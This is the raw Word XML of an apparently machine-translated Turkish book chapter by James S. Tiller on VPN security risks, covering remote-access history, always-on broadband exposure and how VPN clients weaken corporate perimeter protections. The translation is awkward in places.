    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>James S. Tiller, CISA, CISSP</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nal özel ağların (VPN) pek çok farklı işletme disiplini içinde olağanüstü bir şekilde popüler hale gelmesi şaşırtıcı değildir. Dikey pazar veya ticaretten bağımsız olarak, VPN'ler iletişim gerekliliklerinde önemli bir rol oynayabilir, bu durum uygulandığında esneklik ve yatırım geri dönüşü sağ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üzgün şekilde kullanıldı. VPN'lerin kabulü geniş ve hızlı olmuştur; ve teknoloji ilerledikçe, bu eğilim</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dece artış. VPN’lerin popülaritesinin bir kısmı, uygulamanın algılanan nispi kolaylığından kaynaklan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knolojisi. Bu algılanan basitlik ve ucuz, sınırsız erişim vaadi için çılgın bir acele yaratt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yeni haberleşme iletişim türünden yararlanın. Maalesef, VPN’lerin bu baskın özellikleri, gizli kaldığı ve satış sözlüklerinden ve ürün sunumlarından gizlenmiş gibi görünen temel güvenlik kusurlarını gölgede bıraktı. Bu bölüm VPN'lerle ilgili güvenlik risklerine ışık tutmaya adanmışt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VPN’lerin güvenlik ile eşanlamlı olduklarını yanlış anlam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kuyucunun burada açıklanan güvenlik sınırlamalarının VPN teknolojisinin kendisiyle hiçbir ilgisi olmadığını anlaması çok önemlidir. Kullanılabilecek birkaç VPN teknolojisi türü vardır - örneğin, IPSec, SS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PPTP, birkaçı belirtmeksizin - ve her birinin gereksinimlere ve uygulamaya bağlı olarak avantaj ve dezavantajları vardır. Ek olarak, her biri bir koşul karışımını barındırmak için yükseltilebilecek çeşitli güvenlik seviyelerine sahiptir. VPN'lerin orta ve süreç olarak güvensizlikleri, teknik yönleri veya standartları değil, tartışıl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le alınan, VPN’lerin satışlardan gelen genel tüketici tarafından değerlendirilmes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reçler piyasayı ve sektörün tüketicilerin ihtiyaçlarını karşıladığını iddia eden ürünleri sular altında bırakıyor. Ne yazık k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lep çok büyük ve artmaya entegre olabilecek yeterli kontrollerin geliştirilmes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şu anda yaşanmakta olanın gerisinde kalıyor. “Güvenlik” sözcüğü sık sık göründüğünd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nelde VPN'i tanımlarken geçerli olan VPN'ler tartışılmaktadır - içindeki verilerin korunmas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ransit. Ne yazık ki, iletişimin güvenliği, güvenliğin en önemli olduğu nokta olan VPN'in sonlandırma noktasında durmaktadı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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Dolaşan Kullanıcıla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Dolaşım, esir nüfusa hizmet sağlayan ve aynı hizmetlere normal sınırların dışından erişilebilmesini sağlayan erken ağların doğal ilerlemesi ile karakterize edilir. ağ. Görünüşe göre bir gecede, kullanıcılara uzaktan erişim sağlanması çok önemliydi ve bunu sağlamak için muazzam kaynaklar tahsis edildi. İlk olarak, Ek 43.1’de gösterildiği gibi, modemler toplandı ve ortak bir cihaza bağlandı. dahili ağa erişim sağlanmış ve tabii ki modemler telefon hatlarına bağlanmış sonuçta erişim sağladı. Uygulama gereksinimleri katlanarak arttıkça, modemlerin iletim hızı ılımlı bir şekilde artmış ve değişim ufukta gerçekleşmiştir. İlk değişim dalgası şeklinde geldi uzak masaüstleri veya bazı durumlarda tüm sistemler. Ek 43.2'de ayrıntılı olarak açıklandığı gibi, bir kullanıcı arayacak ve bağlanacaktı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r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505864AD" wp14:editId="6A1B1CEF">
            <wp:extent cx="3954780" cy="3040380"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="4115" name="Resim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54780" cy="3040380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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z w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>İnternet Kabulü</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in büyümesi olağanüstü olmuştur. İnternete ilk adımlarını atan insanların sayısından, iletişim teknolojilerindeki sıçramalara, İnternet kullanımı giderek daha yoğun ve daha fazla hale geld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oldurulur. İnternet, ticari ve kişisel iletişim için bir gereksinim haline geld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enilik veya basit eğlence için. İnternet ile bir şekilde ilişkili olmayan işletmeler şimd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nişletmek için kaldıraç kullanmaya çalışmak ve maliyetleri düşürürken müşteri memnuniyetini artırmak. Nadir değil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kuruluşun varsayılan yükleme olarak yeni veya mevcut bir ofis için Internet bağlantısı içermesi için.</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Buna karşılık, adanmış İnternet bağlantılarının ilk uygulayıcıları, bir kural olarak, tüm organizasyon. Ek 43.3'te gösterildiği gibi, uzak ofisler geniş bir alana girerek erişebilir İnternetin erişilebilir olduğu merkezi konuma ağ (WAN). Bu çok yaygın tasarım senaryosu İnternet trafiği ve gereklilikleri kapsam ve sıklık açısından sınırlı olduğunda tatmin edicidir. İnternet erişimi için gereksinimler arttıkça, WAN başlayana kadar bağlantıların sayısı doğru orantılı olarak artmıştır. acı çekmek. Bundan kısa bir süre sonra, doğrudan bağlantı maliyetleri azaldıkça ve İnternet gittikçe daha iş hayatının bir parçası daha önemli bir araç haline geldi ve daha fazla erişim gerekiyordu.</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İnternetin geniş kabulü ve temel bir gereklilik olarak kabul edilmesi, İnternetin yoğunluğu ve çeşitliliği arttı. Günümüzde kuruluşların çeşitli erişim noktaları ve kaldıraçları vardır. diğer iç ağlardaki yükü azaltmak ve iç kullanıcılar için daha yüksek performans sağlamak için servis fazlalığı sağlamak gibi. Çok sayıda mevcut bağlantıdan yararlanarak, bir kuruluş VPN teknolojisini kullanarak, VPN'lerin dahil edilmesinden çok önce maliyeti makul olan bir hizmeti kullanırken iletişimi geliştirmek için uygulayabil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8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Genişbant</w:t>
      </w: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nümüzde standart olan İnternete yüksek hızlı erişimin varlığından önce, tipik olarak yalnızca acı verici bir şekilde yavaş erişim sağlayan modemler ve telefon hatları vardı. Elbette, ISDN'ye sahip bazı ayrıcalıklı kullanıcılar için rahatlama sağlayan birkaç kullanıcı vardı. Ancak, erişim hala modemlere dayanıyordu ve düzgün çalışmak için bir kabus olabilirdi. Uzaktan erişimin ilk uygulayıcıları veri veya hizmet elde etmek için modem kullandılar. İnternet popülerleştikçe, modemler İnternete erişim için araç sağlayan bir İnternet servis sağlayıcısına (İSS) bağlanmak için kullanıldı. Her iki durumda da, sınırlı hız yetenekleri sıkıntıl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bit.</w:t>
      </w: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günün kişisel ve evden internete erişimi, tarihsel olarak yalnızca en büyük şirketlerin karşılayabileceği veya elde edebileceği pahalı hatlarla gerçekleştirilen hızlara erişebilir. Şu anda, ISS'ye bağlantı sağlayan ve evdeki veya küçük ofisdeki ana bilgisayara bağlanmak için Ethernet kullanan basit bir cihaz kurulabilir. Günümüzde erişim, bilgisayardan ayrı olarak sağlanmaktadır ve kontrol edilmektedir ve nadiren kullanıcı müdahalesi gerektirir. Fiziksel bağlantı ve iletişim ortamı kullanıcı ortamına karşı saydamdır. Genellikle, kullanıcı bilgisayarı açar ve Internet hemen kullanılabilir durumdadır. Bu, her biri sinyal sonlandırma noktası olmak için birlikte çalışan, kullanıcının sistemi ve modem ile ilişkili fiziksel bağlantının tam aksine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bağlantıyı sağlamakla ilişkili tüm sorumlulukları üstlenmek.</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çok iletişim teknolojisinde olduğu gibi (özellikle modem tabanlı uzaktan erişim konusu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 cihazlara veya modemlere bağlantı sağlamak için sonlandırma noktası sağlanmalıdır. Çevirmel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özümler, uzak sistemin çevirip kurması için bir modem (sanal veya fiziksel) sağlan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letişim. Kablo bantları veya xDSL teknolojileri için de genişbant için benzer bir gereksinim bulunmaktadır: evdeki veya ofisteki uzak cihazlara bağlantı oluşturmak için bir sonlandırma noktası sağlanmalıdı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kirdek sonlandırma noktası - VPN'lerin kabulü ile ilgili olarak -</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niş bant ve modemler arasındaki farklılaşma faktörleri. Çalışanlara uzaktan çevirmeli erişim sağlamak için, bir sunucuya - veya bu konuda iş istasyonuna - tek bir modem takılabilir ve bir telefon hattı eklen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 kullanıcı bir modem, telefon numarası ve bazı temel yazılımların kullanımı ile sağlanabilir; b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isteme ve hizmetlere geniş bir erişim sağlamak için bağlantı kurulabilir. Buna karşın, geniş bant uygulamaları daha karmaşık ve çok daha pahalıdır; bu nedenle, bugün yalnızca servis sağlayıcılar bu tür teknolojiyi uygularlar. Bir örnek Internet kablo servisidir; çok fazla şirket kendi iç uzaktan erişim çözümünü oluşturmak için kablo altyapısına erişemiyo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u anda, geniş bant noktadan noktaya uzaktan erişim çözümleri için kullanılmıyor. Orada temel yatıyo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lerin çekiciliği: Bu ileri iletişim teknolojisini şirket kaynaklarına erişmek için kullanmanın bir yolu.</w:t>
      </w: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dece uygulama hızındaki büyük artış cazip değil, çünkü bazı uygulama gereksinimleri de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odemlerin sağladığı sınırlı bant genişliği için harikadır, ancak teknolojinin bilgisayardan ayrılması, basitleştirilmiş ve ölçeklenebilir bir entegrasyon sağlar. Bu koşullar altında, geniş bant kurumsal kaynaklara erişim için son derece caziptir. Yüksek hızlı Internet'te gezinme ve kişisel geziler için geniş bant olması bir şeydir, ancak iş amacıyla aynı özelliklere sahip olması bir başkadır. Maalesef</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önce tarif edildiği gibi, genişbant teknolojileri karmaşık olmayan ve bir servis sağlayıcı kuruluşun iç kullanım için uygulamak için olanaksızdır. Sonuç, şu anda yalnızca İnternet erişimi sağlayan, yani VPN'lerin ortaya çıkmasına kadar olan yüksek hızlı bir iletişim çözümüdür.</w:t>
      </w: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b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Genişletilmiş erişim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>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 xml:space="preserve">İletişim yetenekleri arttıkça ve şirketler İnternet faaliyetlerini günlük prosedürlere entegre etmeye devam ettikçe, ikisini birleştirmek için VPN teknolojisinin oluşturulması kritikti. İnternete ve genişbant'a çevirmeli erişim, neredeyse her yerden ve yüksek hızlarla Internet'e erişim sağlar. Her ikisi de İnternete küresel erişime izin vermektedir, ancak şirket merkeziyle bağlantıyı sonlandırmanın uygun veya uygun maliyetli bir yolu yoktur. Genişbant erişimi İnternet ile yakından ilişkili olduğu ve doğrudan arama </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>çözümlerinin etkisiz ve pahalı olduğu için, öngörülebilir tek çözüm özel sağlamak için Internet'i kullanmaktı. iletişim. Bu sonuçta kuruluşların mevcut internet yatırımlarına yatırımlarını çok yönlü uzak bağlantılara kullanmalarını sağladı. Nihai engel, gizlilik, bilgi bütünlüğü, erişim kontrolü, kimlik doğrulama, denetim ve bazı durumlarda reddedilmeme şeklinde iletişimin güvenliğini sağlamaktı.</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İnternet'in küresel kabulü, kullanılabilirliği ve mevcut artan hızlar, çevirmeli bağlantı ile sınırsız erişim. Çevirmeli ağ kurmak için telefon sistemi kullanıldı. iletişim - ve telefonlar her yerde. Seri iletişimin kendisi, günlük bilgisayar korsanlarına müdahale etmesi zor olan ve bu nedenle nispeten güvenli olan özel bir devre üzerinden gerçekleştirildi. Artık İnternet her yerde olduğu için, artan hızlardan yararlanırken telefon şebekesinde var olan kullanılabilirliği çoğaltmak için kullanılabilir. İnternete bağlanmak için modem kullanılıyorsa, hız gerçekleştirilmez ve telefon sistemi bağlanmak için kullanılır, ancak yerel olarak; İnternet hala kullanılıyor ortak bağlantı ortamı için. Çevirmeli uzaktan erişim ile bile, bu hizmette büyük bir sıçrama oldu, çünkü birçok şirket tarafından sağlanan uzaktan erişim çözümünün yurtdışından bağlantısı zor olabilir. Politika ile sınırlandırılmadığı takdirde, telefon ekipmanı ve sistemleri bugün oldukları kalitede olmadığından ve uzun mesafeli yayınlar bağlantıyı engelleyeceğinden, maliyet bir sorun haline geldi. Buna karşılık, dünya genelinde telefon numaraları sağlayan çok büyük ISS'ler hariç, İnternet'e erişebilecek on binlerce ISS dünya çapında var. Son olarak, görünüşte bitmeyen erişim noktalarının sağlanmasına ek olarak, Dünya genelinde yüzlerce ISS için faturalandırma ve yönetim için merkezi bir nokta. Kullanıcı bakış açısına göre, dünyanın her yerinde büyük bir ISS var. Nihai engel, iletişimde olduğu gibi transit geçişe veya maruz kalmaya karşı korumayı sağlamaktı. telefon şebekesi üzerinden eski uzaktan erişim ile oluştu. Bunu doldurmak için VPN teknolojisi hemen kullanıldı. boşluk. genişletilmiş iletişim yetenekleri gelişine ve internet durumu ile everexpanding kurumsal varlığı kolayca desteklenebilir ve taşıma sırasında korunu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Her Zaman Bağlı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Geçmişte, uzak bir kullanıcı merkezde modem bankasını arayabilir ve uzaktan servislere erişebilirdi kulak misafiri, aktarımın durdurulması veya kimliğe bürünme konusunda çok az endişe duyulması Barındırma sitesi açısından, maruz kalmayı azaltmak için güvenlik katmanları uygulanabilir. İletişim üzerindeki kontrolü artırmak ve tehditlere maruz kalmayı azaltmak için kimlik doğrulama, geri arama, zaman kısıtlamaları ve erişim kısıtlamaları kullanılmıştır. Bu koruma paketleri öncelikle iletişimin bire bir yönü nedeniyle mümkün olmuştur; Bağlantı kurulduktan sonra kolayca tanımlanabilir ve kontrol edilebilir. Gibi iletişimin kendisi kadarıyla, kamuya açık telefon sistemi üzerinden geçerken nispeten korunmuştur. özel devreler. Geniş bant teknolojisi, erişim cihazına bağlanmaya izin vermek için Ethernet'i kullanabileceği için, bilgisayar İnternet iletişimi için sadece "açık" olması gerekir (bkz. Ek 43.4). Bu büyük bir değişiklik gösterir bağlantının kurulmasından ve sürdürülmesinden bilgisayarın sorumlu olduğu geleneksel modem erişimi. Şu anda, tipik genişbant ile bağlantı, internet erişimine izin vererek erişim cihazında sürdürülmektedir. Ethernet arayüzündeki diğer sistemlerin durumundan bağımsız olarak bağlantı. Bilgisayardaki Ethernet arayüzü, kullanıcının onu başlatmasını, telefon numarasını bilmesini veya bağlantıyla ilgilenmesini gerektirmez. Tüm bu seçenekler işletim sistemi tarafından kontrol edilir; IP adresi bile otomatik olarak atanır. ISS, kullanıcıyla etkileşimi daha da azaltıyor. Artık İnternet bağlantısının sorumluluğu yalnızca erişim cihazına dayanmakta ve kullanıcıyı ve kullanıcının bilgisayarını bağlantıyı sürdürme ihtiyacından kurtarmaktadır. Son sistem sadece ağdaki bir düğümdür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>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br/>
        <w:t>Erişim cihazına bağlı olan bilgisayarlar, Internet'e çok az korumasız veya korumasız olarak bağlan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geniş bant sağlayıcısının bilgisayardaki kabloyu veya hattı ve Ethernet arabirimini takması çok yaygın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ve doğrudan güvenlik düzenlemesi olmadan sistemi bağlayın. Bu, temel uç sistemlere sahip olmamaya neden olu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kontrolü, uzun süre doğrudan Internet’e bağlanır. Far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uazzam. İnternet üzerinde dolaşım yapan bir kullanıcının geçici bir örneği yerine, bir ISS'yi ararken IP adresi, trafik türü ve hatta bilgisayarın konumu uzun süre internete maruz kalır. Şirketler için doğrudan kullanıcı çevirmeli bağlantı desteği ile karşılaştırıldığında, pozlama şaşırtıcı. Belirgin fark, kullanıcının İnternete bağlı olmasıdır; oysa şirket tarafından sağlanan çevirmeli bağlantı servisi noktadan noktayadır. Bir sistem İnternet'e bağlandığında, türüne bakılmaksızın, bir şebekeye maruz kaldığı yaygın olarak kabul ed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uazzam tehdit sayısı. Ayrıca, bağlantının sürekli olduğu sürenin uzunluğu arttıkça kabul ed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urulan, maruz kalma veya bulunma ve hedeflenme riski de artar. Güvenlik duvarları genellikle yerleştir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bağlantıları olan ağlar, ancak bunlar genellikle kesintili ana makinelerde görülmez.</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e bağlantı. Sebeplerden biri bağlantının niteliği olabilir - çok daha zordu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areketli bir hedefi vurmak için. Ancak gerçek şu ki, bu yanıltıcı olabilir ve dolaşım sistemler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özel bağlantıya sahip bir sistemle aynı şekilde. Kısacası, İnternet’e çevirmeli erişim,</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hditler için sistem ve özel bağlantılar aynı tehditlere de maruz kalır, ancak riski daha yüksekt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genellikle süreye atfedilebilir. İnternete bağlıysanız, her zaman veya her zaman, genişbant veya modem ile bağlı olup olmadığına bakılmaksızın saldırıya maruz kalırsınız; sadece öyle olur ki, her zaman bağlandığında, sen uçan bir ördek değil, oturan bir ördek olursun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kurumsal Ağlara Erişim</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 teknolojisi, uzak kullanıcıların yararlanarak şirket kaynaklarına erişebilmelerini sağlayan son katalizördü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Bu doğal bir ilerlemeydi; İnternet her yerde. Telefon sistemi gibi, daha yüksek bant genişliği bağlantıları norm haline geliyor ve VPN teknolojisi iletimi şifreleme teknikleri ve kimlik doğrulama ile güvence altına alıyor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>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in başarısının büyük bir kısmı genişbant teknolojilerinin ortaya çıkışı ve bulunabilirliği ile ilişkilendirild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üksek hızlı erişim, İnternet’te dolaşıp daha hızlı şeyleri daha hızlı almanız için mükemmeldi ancak hepsi bu kad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redeyse bir gecede, genellikle 32K veya hatta 56K modemler gibi kişisel erişimle ilişkili bant genişliği internete 100 kat arttı. Kamu telefon sisteminden uzaklaşarak elde edilen daha yüksek erişim hızları ve özel geniş bant bağlantılarına modemler hızlı bir şekilde heyecan kaybedilmiş; Ancak, aynı zamanda, çoğu hizmetin kurumsal kaynaklara erişmesini istedi. Heyecan, erişim hızlarındaki büyük atılımdan kurtulduğundan, birçok kişi bunu uzaktan erişim için kullanmanın yollarını gördü. Bu işt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 teknolojisinin kaçtığını ve teknik toplumu absorbe ettiğini belirtme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lay yerindeki ilk istemci uzak yazılımdı. Bir ürün paketi, şirket sitesindeki İnternete bağlı bir cihazı ve dolaşım sistemine yüklenen istemci yazılımını içeriyordu ve bu da internet üzerinden şirket kaynaklarına uzaktan erişim sağladı. Uzaktan erişim çözümlerine çok fazla zaman ve para yatırıldı ve bu bugün de devam ediyor. Uzak istemci tabanlı erişim ile uyum içinde, VPN'lere yapılan acele, VPN sonlandırmasını sağlayan DSL ve kablo modem değiştirmelerine katıldı ve müşteriyi bir kez daha rahatlatt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letişimin sorumluluğundan sistem. VPN'ler şimdi teknik manzara boyunca genişbant erişiminin şiddetli bir rüzgarıyla itilen bir orman yangın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rket ağına dizginsiz erişim sağlandıktan sonra, uzak siteler için nadir değildi vey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ormalde ayrıntılı güvenlik duvarlarının ve şirket sitesinde sağlanan diğer koruma paketlerinin koruması altında tutulan verileri kopyalamak veya açmak için kullanıcılar. Birçok uygulamada, VPN'ler, uygulamaların çalışmasını sağlamak için kullanıl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ormalde uzak sistemlerde kullanılamaz veya uzak ofislerdeki çalışanlara sağlamak için pahalı kaynaklar ve destek gerektirmez. Kısacası, VPN'ler, genellikle dahili ağda bulunan bir sistem için mevcut olan hemen hemen her şey için kullanılıyor. Satıcıların, iç ağda işlem yapıyormuş gibi yapmaları için teknolojiyi sattıklarını göz önünde bulundurarak bu beklenen bir durumdur. Bazı çözümler, Microsoft'un Windows İnternet Adlandırma Hizmeti'ni (WINS) ve NetBIOS özelliklerini, şirket sitesinde sanki sistemlerde ve kaynaklarda Etki Alanı taramasına izin vermek için ürünlerine dahil ede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Temel olarak, VPN'ler uzaktan faaliyetleri iç faaliyetlere mümkün olduğunca sorunsuz bir şekilde entegre etmek için her derde deva olarak uygulanmaktadır. Nihai ürün, veriler ve uygulamalar kontrollü bir ortamın dışındaki sistemlerden yürütülmekte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Erişim noktalar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mamen iç ağlarda bulunan sistemler için iç hizmetlerin olması beklenir. Dahili ağ tipik olarak güvenlik politikaları ve prosedürlerinin uygulandığı kontrol edilen, korunan ve izlenen bir ortamdır. Hizmetlere ve verilere dahili olarak erişildiği için, bu iletişime maruz kalma veya tehdit biraz</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inen ve bir düzeyde kabul edilen. Çoğu kurum iç ağlar üzerindeki güvenlik tehditlerinin farkındadır, ancak saldırıya uğrarsa zararın değeri veya etkisi ile doğrudan orantılı bir risk seviyesi üstlenmiştir. Bunun çoğu basit nüfus kontrolüne bağlanıyor; Dahili kaynaklar için daha fazla risk üstlenirler, çünkü İnternette dahili olarak daha az insan vardır, etkileşim genellikle gereklidir (dolayısıyla bir ağ) ve istenirse her sistem izlenebilir. Temel olarak, bazı istatistikler bize iç ağların kurumsal verilere yönelik artan bir saldırı kaynağı olduğunu söylese de, kuruluşlar içinde bulunanları kontrol edebildiklerinden emin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nların duvarları. Güvenlik politikaları olmayan ve kendilerini savunmasız olarak görebilecek örgütler bil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üvenlik önlemlerini uygun gördüğü şekilde büyütmek ve uygulamak için her zaman yer olduğunu varsayınız. Bununla birlikt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birçok kuruluşun gözünde çok daha büyük bir tehdit oluşturuyor ve bu bazı kuruluşlar için gerçek olabilir; her biri farklı. Temel nokta, İnternet'in bilinmeyen ve her zaman bir tehdit olacağı, oysa belirli önlemler alınabileceği - ya da riskin kabul edilebileceği - daha kolay bir şekilde iç ağda olmasıdır. Her durumda, dahili ağlar, bir işi desteklemek veya büyümek için bilgileri paylaşmak ve işbirliği yapmak için kullanılır ve bu da insanların Internet üzerinden evden istediği açık etkileşimidi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 teknolojisi, varsayılan duruş ve kontrol erişiminin tam bir çelişkisidir. İç ağ,</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ygulamaların, hizmetlerin ve verilerin bulunduğu yerlerde, güvenlik duvarları, prosedürler ve işlemler sayesinde güvenli kabul ed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öneticiler tarafından denetlenen güvenlik, bir şekilde veya başka bir şekilde güvenliği sağlamaya odaklanmıştır. Ancak, doğas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 kurumsal güvenliğin temel varsayımını ve anlaşılan güvenlik tutumunu olumsuzlar. Saldırganlar kim</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ertleştirilmiş şirket güvenlik duvarları tarafından engellenmiş olabilir uzak VPN istemcilerini çok daha kolay hedefler bu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ynı sonuçları sağlayabil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nel olarak, yöneticiler sürekli güvenlik düzeltme ekleri uyguluyor, süreçleri güncelliyor ve performans sergiliyor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ritik sistemlerde güvenlik açıklarından korunmak için genel güvenlik bakımı. Bu arada, bu güvenlik açıkları, kullanıcılarının sistemlerini aynı bütünlükte sürdürmeleri daha az muhtemel olan son kullanıcı sistemlerinde kalmaktadır. İleri düzeyde bir kullanıcının kapsamlı bir koruma planı sunması durumu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 sistemler işletme sınıfı işletim sistemlerini çalıştırmaz ve kendiliğinden güvensizdir. Microsoft’un Windows 95 ve 98 platformları şu anda kişisel veya son kullanıcı sınıfı sistemlerin çoğunda kuruludur ve sınırlı güvenlik yetenekleri ve genel sağlamlık açısından iyi bilinmektedir. Bu nedenle, temel kusurlar sistemdeki uygulamalı güvenliği zayıflat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Ortak bir VPN uygulamasına katkıda bulunan özelliklerin çarpışması, şirket sitesinde uygulanan güvenlik altyapısının iptal edilmesiyle sonuçlanır. İnternete karşı korumanın neredeyse her yönü, bir kullanıcının bir VPN ile şirkete bağlandığı dakikada geçersizdir. Tek bir koruma noktası, yalnızca korunan ağ kaçınılan geçici ortamla etkileşime girmediğinde geçerli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Güvenlik Zarf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xml:space="preserve">Bu muazzam maruz kalmayı tamamen kavramak için, bir güvenlik duvarı ve izinsiz giriş tespit sistemi ile İnternet'ten bölünmüş bir şirket ağı düşünün ve hatta silahlı güvenlik görevlilerinin özel bir sistem topluluğunun </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
